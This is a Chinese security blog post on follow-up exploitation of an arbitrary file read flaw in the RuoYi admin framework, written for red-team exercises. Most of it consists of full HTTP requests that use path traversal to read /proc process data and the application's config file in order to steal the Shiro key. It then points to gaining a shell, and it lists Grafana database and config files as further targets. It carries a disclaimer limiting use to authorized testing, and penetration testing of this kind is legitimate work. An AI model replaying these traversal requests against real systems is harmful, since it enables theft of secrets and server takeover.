前言
关于若依管理后台相信大家都不陌生,现在很多的程序都是直接利用该框架进行二次开发
在攻防演练的过程中,关于若依系统的测试往往是一个很重要的突破口
关于网上已经爆出的漏洞,大多数都是介绍怎么进行复现,至于后续怎么利用,大家只能凭自己的经验
以下是一个关于任意文件读取的后续利用思路:
任意文件读取进阶利用
读取java进程信息
GET /zzadmin/common/download/resource?resource=/profile/../../../../../../../../../../../../../../proc/sched_debug HTTP/1.1
Host: xx.xx.xx.xx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=410244a8-9c54-457b-b5aa-4bf26827a5a6
Connection: close
Content-Length: 2
读取cmdline信息
GET /zzadmin/common/download/resource?resource=/profile/../../../../../../../../../../../../../../proc/6527/cmdline HTTP/1.1
Host: xx.xx.xx.xx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=410244a8-9c54-457b-b5aa-4bf26827a5a6
Connection: close
Content-Length: 2
获取shiro key
拼接弱依安装路径获取shiro key
GET /zzadmin/common/download/resource?resource=/profile/../../../../../../../../../../../../../../home/tongweb7/deployment/zzadmin/WEB-INF/classes/application.yml HTTP/1.1
Host: xx.xx.xx.xx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=dca9f2db-0b4a-4cdc-8b7d-cdd2e848b569
Connection: close
Shirt key都有了,下一步就是梭哈获取shell,进行愉快的后续渗透测试啦
总结
关于任意文件读取的漏洞,大部分都是需要大概了解当前系统的架构,然后针对性的获取所需文件,
例如针对Grafana的任意文件读取,大家只会说可以读取/etc/passwd
但是如何进行后续的测试,基本上很难提及,咱们可以读取的文件有哪些,
例如咱们还可以获取一下信息:
- 读数据库(
/var/lib/grafana/grafana.db
) - 读配置文件(
/etc/grafana/grafana.ini
)
© 版权声明
安全小天地的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
安全小天地拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:anquanclub@foxmail.com
THE END
请登录后查看评论内容